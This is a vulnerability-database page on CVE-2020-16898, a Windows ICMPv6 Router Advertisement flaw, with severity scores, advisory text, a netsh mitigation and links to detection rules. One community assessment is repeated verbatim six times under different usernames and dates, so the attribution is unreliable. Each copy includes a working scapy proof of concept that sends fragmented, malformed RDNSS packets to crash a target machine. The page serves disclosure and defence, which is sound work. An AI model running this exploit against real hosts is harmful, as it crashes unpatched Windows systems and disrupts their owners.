7.8 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:N/I:N/A:C
8.8 High
CVSS3
Attack Vector
ADJACENT
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
8.5 High
AI Score
Confidence
High
0.008 Low
EPSS
Percentile
81.3%
A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could gain the ability to execute code on the target server or client.
To exploit this vulnerability, an attacker would have to send specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer.
The update addresses the vulnerability by correcting how the Windows TCP/IP stack handles ICMPv6 Router Advertisement packets.
Recent assessments:
kevthehermit at October 16, 2020 5:29pm UTC reported:
Crafting IPv6 ICMP Router Advertisement Packets can lead to DOS or potential RCE on vulnerable devices. It is going to be difficult to develop a Full RCE with this exploit. You should of course patch quickly, however you do not need to “panic” when applying patches and mitigations for this across your estate.
The range of Windows Operating Systems impacted by this exploit is smaller than expected as this is a relatively new feature in the code. Server 2019 is not widely used on the open internet so is unlikely to garner much attention and Automatic Security Updates to windows 10 devices should mean that organisations are less vulnerable to this becomes a widespread effective exploit.
Patching is of course the best mitigation.
Disable IPv6 is a mitigation I have seen talked about this is a bad idea if you don’t understand what on your system may already be using it. Instead, disable the specific feature netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable
Suricata – <https://github.com/advanced-threat-research/CVE-2020-16898>
Snort – <https://www.snort.org/rule_docs/1-55984>
Zeek – <https://github.com/corelight/CVE-2020-16898>
Microsoft Advisory – <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>
McAfee have a great writeup that details the vulnerability so I’m not going to repeat that read it from the source :)
<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/>
QuarksLab have also released a detailed blog post explaining how they were able to create a PoC – <https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html>
There are two elements to this vulnerability:
It is trivial to trigger a crash condition that will lead to BSOD and force a restart of the OS. The POC contains python scapy code that can be used to crash a vulnerable target
Whilst RCE is technically possible gaining it from this exploit alone is extremely difficult due to the nature of the vuln and the protections in place on modern Windows.
Paired with another vulnerability that can leak additional information in memory it is possible this could lead to RCE and from there to a wormable exploit.
The QuarksLab research includes a Python PoC that is successful at triggering a Crash. The poc is replicated and very slightly modified here.
from scapy.all import *
def trigger(target_addr):
ip = IPv6(dst = target_addr)
ra = ICMPv6ND_RA()
rdnss = ICMPv6NDOptRDNSS(lifetime=900, dns=["3030:3030:3030:3030:3030:3030:3030:3030",
"3131:3131:3131:3131:3131:3131:3131:3131"])
# We put an even value for the option length (original length was 5)
rdnss.len = len(rdnss.dns) * 2
truncated = bytes(rdnss)[: (rdnss.len-1) * 8]
# The last 8 bytes of the crafted RDNSS option are interpreted as the start of a second option
# We build a Route Information Option here
# https://tools.ietf.org/html/rfc4191#section-2.3
# Second byte (0x22) is the Length. This controls the size of the buffer overflow
# (in this case, 0x22 * 8 == 0x110 bytes will be written to the stack buffer)
routeinfo = b'\x18\x22\xfd\x81\x00\x00\x03\x84'
# the value that overwrites the return address is taken from here
correct = ICMPv6NDOptRDNSS(lifetime=900, dns=["4141:4141:4141:4141:4141:4141:4141:4141",
"4242:4242:4242:4242:4242:4242:4242:4242"])
crafted = truncated + routeinfo
FH=IPv6ExtHdrFragment()
ip.hlim = 255
packet = ip/FH/ra/crafted/correct/correct/correct/correct/correct/correct/correct/correct/correct
#send(packet)
#return
frags=fragment6(packet, 100)
print("len of packet: %d | number of frags: %d" % (len(packet), len(frags)))
packet.show()
for frag in frags:
send(frag, verbose=False)
target_addr = "fe80::3935:5625:ea02:25c9"
trigger(target_addr)
zeroSteiner at October 27, 2020 7:26pm UTC reported:
Crafting IPv6 ICMP Router Advertisement Packets can lead to DOS or potential RCE on vulnerable devices. It is going to be difficult to develop a Full RCE with this exploit. You should of course patch quickly, however you do not need to “panic” when applying patches and mitigations for this across your estate.
The range of Windows Operating Systems impacted by this exploit is smaller than expected as this is a relatively new feature in the code. Server 2019 is not widely used on the open internet so is unlikely to garner much attention and Automatic Security Updates to windows 10 devices should mean that organisations are less vulnerable to this becomes a widespread effective exploit.
Patching is of course the best mitigation.
Disable IPv6 is a mitigation I have seen talked about this is a bad idea if you don’t understand what on your system may already be using it. Instead, disable the specific feature netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable
Suricata – <https://github.com/advanced-threat-research/CVE-2020-16898>
Snort – <https://www.snort.org/rule_docs/1-55984>
Zeek – <https://github.com/corelight/CVE-2020-16898>
Microsoft Advisory – <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>
McAfee have a great writeup that details the vulnerability so I’m not going to repeat that read it from the source :)
<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/>
QuarksLab have also released a detailed blog post explaining how they were able to create a PoC – <https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html>
There are two elements to this vulnerability:
It is trivial to trigger a crash condition that will lead to BSOD and force a restart of the OS. The POC contains python scapy code that can be used to crash a vulnerable target
Whilst RCE is technically possible gaining it from this exploit alone is extremely difficult due to the nature of the vuln and the protections in place on modern Windows.
Paired with another vulnerability that can leak additional information in memory it is possible this could lead to RCE and from there to a wormable exploit.
The QuarksLab research includes a Python PoC that is successful at triggering a Crash. The poc is replicated and very slightly modified here.
from scapy.all import *
def trigger(target_addr):
ip = IPv6(dst = target_addr)
ra = ICMPv6ND_RA()
rdnss = ICMPv6NDOptRDNSS(lifetime=900, dns=["3030:3030:3030:3030:3030:3030:3030:3030",
"3131:3131:3131:3131:3131:3131:3131:3131"])
# We put an even value for the option length (original length was 5)
rdnss.len = len(rdnss.dns) * 2
truncated = bytes(rdnss)[: (rdnss.len-1) * 8]
# The last 8 bytes of the crafted RDNSS option are interpreted as the start of a second option
# We build a Route Information Option here
# https://tools.ietf.org/html/rfc4191#section-2.3
# Second byte (0x22) is the Length. This controls the size of the buffer overflow
# (in this case, 0x22 * 8 == 0x110 bytes will be written to the stack buffer)
routeinfo = b'\x18\x22\xfd\x81\x00\x00\x03\x84'
# the value that overwrites the return address is taken from here
correct = ICMPv6NDOptRDNSS(lifetime=900, dns=["4141:4141:4141:4141:4141:4141:4141:4141",
"4242:4242:4242:4242:4242:4242:4242:4242"])
crafted = truncated + routeinfo
FH=IPv6ExtHdrFragment()
ip.hlim = 255
packet = ip/FH/ra/crafted/correct/correct/correct/correct/correct/correct/correct/correct/correct
#send(packet)
#return
frags=fragment6(packet, 100)
print("len of packet: %d | number of frags: %d" % (len(packet), len(frags)))
packet.show()
for frag in frags:
send(frag, verbose=False)
target_addr = "fe80::3935:5625:ea02:25c9"
trigger(target_addr)
cl64rk at October 13, 2020 7:09pm UTC reported:
Crafting IPv6 ICMP Router Advertisement Packets can lead to DOS or potential RCE on vulnerable devices. It is going to be difficult to develop a Full RCE with this exploit. You should of course patch quickly, however you do not need to “panic” when applying patches and mitigations for this across your estate.
The range of Windows Operating Systems impacted by this exploit is smaller than expected as this is a relatively new feature in the code. Server 2019 is not widely used on the open internet so is unlikely to garner much attention and Automatic Security Updates to windows 10 devices should mean that organisations are less vulnerable to this becomes a widespread effective exploit.
Patching is of course the best mitigation.
Disable IPv6 is a mitigation I have seen talked about this is a bad idea if you don’t understand what on your system may already be using it. Instead, disable the specific feature netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable
Suricata – <https://github.com/advanced-threat-research/CVE-2020-16898>
Snort – <https://www.snort.org/rule_docs/1-55984>
Zeek – <https://github.com/corelight/CVE-2020-16898>
Microsoft Advisory – <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>
McAfee have a great writeup that details the vulnerability so I’m not going to repeat that read it from the source :)
<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/>
QuarksLab have also released a detailed blog post explaining how they were able to create a PoC – <https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html>
There are two elements to this vulnerability:
It is trivial to trigger a crash condition that will lead to BSOD and force a restart of the OS. The POC contains python scapy code that can be used to crash a vulnerable target
Whilst RCE is technically possible gaining it from this exploit alone is extremely difficult due to the nature of the vuln and the protections in place on modern Windows.
Paired with another vulnerability that can leak additional information in memory it is possible this could lead to RCE and from there to a wormable exploit.
The QuarksLab research includes a Python PoC that is successful at triggering a Crash. The poc is replicated and very slightly modified here.
from scapy.all import *
def trigger(target_addr):
ip = IPv6(dst = target_addr)
ra = ICMPv6ND_RA()
rdnss = ICMPv6NDOptRDNSS(lifetime=900, dns=["3030:3030:3030:3030:3030:3030:3030:3030",
"3131:3131:3131:3131:3131:3131:3131:3131"])
# We put an even value for the option length (original length was 5)
rdnss.len = len(rdnss.dns) * 2
truncated = bytes(rdnss)[: (rdnss.len-1) * 8]
# The last 8 bytes of the crafted RDNSS option are interpreted as the start of a second option
# We build a Route Information Option here
# https://tools.ietf.org/html/rfc4191#section-2.3
# Second byte (0x22) is the Length. This controls the size of the buffer overflow
# (in this case, 0x22 * 8 == 0x110 bytes will be written to the stack buffer)
routeinfo = b'\x18\x22\xfd\x81\x00\x00\x03\x84'
# the value that overwrites the return address is taken from here
correct = ICMPv6NDOptRDNSS(lifetime=900, dns=["4141:4141:4141:4141:4141:4141:4141:4141",
"4242:4242:4242:4242:4242:4242:4242:4242"])
crafted = truncated + routeinfo
FH=IPv6ExtHdrFragment()
ip.hlim = 255
packet = ip/FH/ra/crafted/correct/correct/correct/correct/correct/correct/correct/correct/correct
#send(packet)
#return
frags=fragment6(packet, 100)
print("len of packet: %d | number of frags: %d" % (len(packet), len(frags)))
packet.show()
for frag in frags:
send(frag, verbose=False)
target_addr = "fe80::3935:5625:ea02:25c9"
trigger(target_addr)
adenosine-phosphatase at October 15, 2020 1:15pm UTC reported:
Crafting IPv6 ICMP Router Advertisement Packets can lead to DOS or potential RCE on vulnerable devices. It is going to be difficult to develop a Full RCE with this exploit. You should of course patch quickly, however you do not need to “panic” when applying patches and mitigations for this across your estate.
The range of Windows Operating Systems impacted by this exploit is smaller than expected as this is a relatively new feature in the code. Server 2019 is not widely used on the open internet so is unlikely to garner much attention and Automatic Security Updates to windows 10 devices should mean that organisations are less vulnerable to this becomes a widespread effective exploit.
Patching is of course the best mitigation.
Disable IPv6 is a mitigation I have seen talked about this is a bad idea if you don’t understand what on your system may already be using it. Instead, disable the specific feature netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable
Suricata – <https://github.com/advanced-threat-research/CVE-2020-16898>
Snort – <https://www.snort.org/rule_docs/1-55984>
Zeek – <https://github.com/corelight/CVE-2020-16898>
Microsoft Advisory – <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>
McAfee have a great writeup that details the vulnerability so I’m not going to repeat that read it from the source :)
<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/>
QuarksLab have also released a detailed blog post explaining how they were able to create a PoC – <https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html>
There are two elements to this vulnerability:
It is trivial to trigger a crash condition that will lead to BSOD and force a restart of the OS. The POC contains python scapy code that can be used to crash a vulnerable target
Whilst RCE is technically possible gaining it from this exploit alone is extremely difficult due to the nature of the vuln and the protections in place on modern Windows.
Paired with another vulnerability that can leak additional information in memory it is possible this could lead to RCE and from there to a wormable exploit.
The QuarksLab research includes a Python PoC that is successful at triggering a Crash. The poc is replicated and very slightly modified here.
from scapy.all import *
def trigger(target_addr):
ip = IPv6(dst = target_addr)
ra = ICMPv6ND_RA()
rdnss = ICMPv6NDOptRDNSS(lifetime=900, dns=["3030:3030:3030:3030:3030:3030:3030:3030",
"3131:3131:3131:3131:3131:3131:3131:3131"])
# We put an even value for the option length (original length was 5)
rdnss.len = len(rdnss.dns) * 2
truncated = bytes(rdnss)[: (rdnss.len-1) * 8]
# The last 8 bytes of the crafted RDNSS option are interpreted as the start of a second option
# We build a Route Information Option here
# https://tools.ietf.org/html/rfc4191#section-2.3
# Second byte (0x22) is the Length. This controls the size of the buffer overflow
# (in this case, 0x22 * 8 == 0x110 bytes will be written to the stack buffer)
routeinfo = b'\x18\x22\xfd\x81\x00\x00\x03\x84'
# the value that overwrites the return address is taken from here
correct = ICMPv6NDOptRDNSS(lifetime=900, dns=["4141:4141:4141:4141:4141:4141:4141:4141",
"4242:4242:4242:4242:4242:4242:4242:4242"])
crafted = truncated + routeinfo
FH=IPv6ExtHdrFragment()
ip.hlim = 255
packet = ip/FH/ra/crafted/correct/correct/correct/correct/correct/correct/correct/correct/correct
#send(packet)
#return
frags=fragment6(packet, 100)
print("len of packet: %d | number of frags: %d" % (len(packet), len(frags)))
packet.show()
for frag in frags:
send(frag, verbose=False)
target_addr = "fe80::3935:5625:ea02:25c9"
trigger(target_addr)
gwillcox-r7 at April 23, 2021 8:18pm UTC reported:
Crafting IPv6 ICMP Router Advertisement Packets can lead to DOS or potential RCE on vulnerable devices. It is going to be difficult to develop a Full RCE with this exploit. You should of course patch quickly, however you do not need to “panic” when applying patches and mitigations for this across your estate.
The range of Windows Operating Systems impacted by this exploit is smaller than expected as this is a relatively new feature in the code. Server 2019 is not widely used on the open internet so is unlikely to garner much attention and Automatic Security Updates to windows 10 devices should mean that organisations are less vulnerable to this becomes a widespread effective exploit.
Patching is of course the best mitigation.
Disable IPv6 is a mitigation I have seen talked about this is a bad idea if you don’t understand what on your system may already be using it. Instead, disable the specific feature netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable
Suricata – <https://github.com/advanced-threat-research/CVE-2020-16898>
Snort – <https://www.snort.org/rule_docs/1-55984>
Zeek – <https://github.com/corelight/CVE-2020-16898>
Microsoft Advisory – <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>
McAfee have a great writeup that details the vulnerability so I’m not going to repeat that read it from the source :)
<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/>
QuarksLab have also released a detailed blog post explaining how they were able to create a PoC – <https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html>
There are two elements to this vulnerability:
It is trivial to trigger a crash condition that will lead to BSOD and force a restart of the OS. The POC contains python scapy code that can be used to crash a vulnerable target
Whilst RCE is technically possible gaining it from this exploit alone is extremely difficult due to the nature of the vuln and the protections in place on modern Windows.
Paired with another vulnerability that can leak additional information in memory it is possible this could lead to RCE and from there to a wormable exploit.
The QuarksLab research includes a Python PoC that is successful at triggering a Crash. The poc is replicated and very slightly modified here.
from scapy.all import *
def trigger(target_addr):
ip = IPv6(dst = target_addr)
ra = ICMPv6ND_RA()
rdnss = ICMPv6NDOptRDNSS(lifetime=900, dns=["3030:3030:3030:3030:3030:3030:3030:3030",
"3131:3131:3131:3131:3131:3131:3131:3131"])
# We put an even value for the option length (original length was 5)
rdnss.len = len(rdnss.dns) * 2
truncated = bytes(rdnss)[: (rdnss.len-1) * 8]
# The last 8 bytes of the crafted RDNSS option are interpreted as the start of a second option
# We build a Route Information Option here
# https://tools.ietf.org/html/rfc4191#section-2.3
# Second byte (0x22) is the Length. This controls the size of the buffer overflow
# (in this case, 0x22 * 8 == 0x110 bytes will be written to the stack buffer)
routeinfo = b'\x18\x22\xfd\x81\x00\x00\x03\x84'
# the value that overwrites the return address is taken from here
correct = ICMPv6NDOptRDNSS(lifetime=900, dns=["4141:4141:4141:4141:4141:4141:4141:4141",
"4242:4242:4242:4242:4242:4242:4242:4242"])
crafted = truncated + routeinfo
FH=IPv6ExtHdrFragment()
ip.hlim = 255
packet = ip/FH/ra/crafted/correct/correct/correct/correct/correct/correct/correct/correct/correct
#send(packet)
#return
frags=fragment6(packet, 100)
print("len of packet: %d | number of frags: %d" % (len(packet), len(frags)))
packet.show()
for frag in frags:
send(frag, verbose=False)
target_addr = "fe80::3935:5625:ea02:25c9"
trigger(target_addr)
ccondon-r7 at December 28, 2020 11:18pm UTC reported:
Crafting IPv6 ICMP Router Advertisement Packets can lead to DOS or potential RCE on vulnerable devices. It is going to be difficult to develop a Full RCE with this exploit. You should of course patch quickly, however you do not need to “panic” when applying patches and mitigations for this across your estate.
The range of Windows Operating Systems impacted by this exploit is smaller than expected as this is a relatively new feature in the code. Server 2019 is not widely used on the open internet so is unlikely to garner much attention and Automatic Security Updates to windows 10 devices should mean that organisations are less vulnerable to this becomes a widespread effective exploit.
Patching is of course the best mitigation.
Disable IPv6 is a mitigation I have seen talked about this is a bad idea if you don’t understand what on your system may already be using it. Instead, disable the specific feature netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable
Suricata – <https://github.com/advanced-threat-research/CVE-2020-16898>
Snort – <https://www.snort.org/rule_docs/1-55984>
Zeek – <https://github.com/corelight/CVE-2020-16898>
Microsoft Advisory – <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>
McAfee have a great writeup that details the vulnerability so I’m not going to repeat that read it from the source :)
<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/>
QuarksLab have also released a detailed blog post explaining how they were able to create a PoC – <https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html>
There are two elements to this vulnerability:
It is trivial to trigger a crash condition that will lead to BSOD and force a restart of the OS. The POC contains python scapy code that can be used to crash a vulnerable target
Whilst RCE is technically possible gaining it from this exploit alone is extremely difficult due to the nature of the vuln and the protections in place on modern Windows.
Paired with another vulnerability that can leak additional information in memory it is possible this could lead to RCE and from there to a wormable exploit.
The QuarksLab research includes a Python PoC that is successful at triggering a Crash. The poc is replicated and very slightly modified here.
from scapy.all import *
def trigger(target_addr):
ip = IPv6(dst = target_addr)
ra = ICMPv6ND_RA()
rdnss = ICMPv6NDOptRDNSS(lifetime=900, dns=["3030:3030:3030:3030:3030:3030:3030:3030",
"3131:3131:3131:3131:3131:3131:3131:3131"])
# We put an even value for the option length (original length was 5)
rdnss.len = len(rdnss.dns) * 2
truncated = bytes(rdnss)[: (rdnss.len-1) * 8]
# The last 8 bytes of the crafted RDNSS option are interpreted as the start of a second option
# We build a Route Information Option here
# https://tools.ietf.org/html/rfc4191#section-2.3
# Second byte (0x22) is the Length. This controls the size of the buffer overflow
# (in this case, 0x22 * 8 == 0x110 bytes will be written to the stack buffer)
routeinfo = b'\x18\x22\xfd\x81\x00\x00\x03\x84'
# the value that overwrites the return address is taken from here
correct = ICMPv6NDOptRDNSS(lifetime=900, dns=["4141:4141:4141:4141:4141:4141:4141:4141",
"4242:4242:4242:4242:4242:4242:4242:4242"])
crafted = truncated + routeinfo
FH=IPv6ExtHdrFragment()
ip.hlim = 255
packet = ip/FH/ra/crafted/correct/correct/correct/correct/correct/correct/correct/correct/correct
#send(packet)
#return
frags=fragment6(packet, 100)
print("len of packet: %d | number of frags: %d" % (len(packet), len(frags)))
packet.show()
for frag in frags:
send(frag, verbose=False)
target_addr = "fe80::3935:5625:ea02:25c9"
trigger(target_addr)
Assessed Attacker Value: 4
Assessed Attacker Value: 4Assessed Attacker Value: 2
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16898
doar-e.github.io/blog/2021/04/15/reverse-engineering-tcpipsys-mechanics-of-a-packet-of-the-death-cve-2021-24086/
github.com/0vercl0k/CVE-2021-24086
news.sophos.com/en-us/2020/10/13/top-reason-to-apply-october-2020s-microsoft-patches-ping-of-death-redux/
portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898
www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/
7.8 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:N/I:N/A:C
8.8 High
CVSS3
Attack Vector
ADJACENT
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
8.5 High
AI Score
Confidence
High
0.008 Low
EPSS
Percentile
81.3%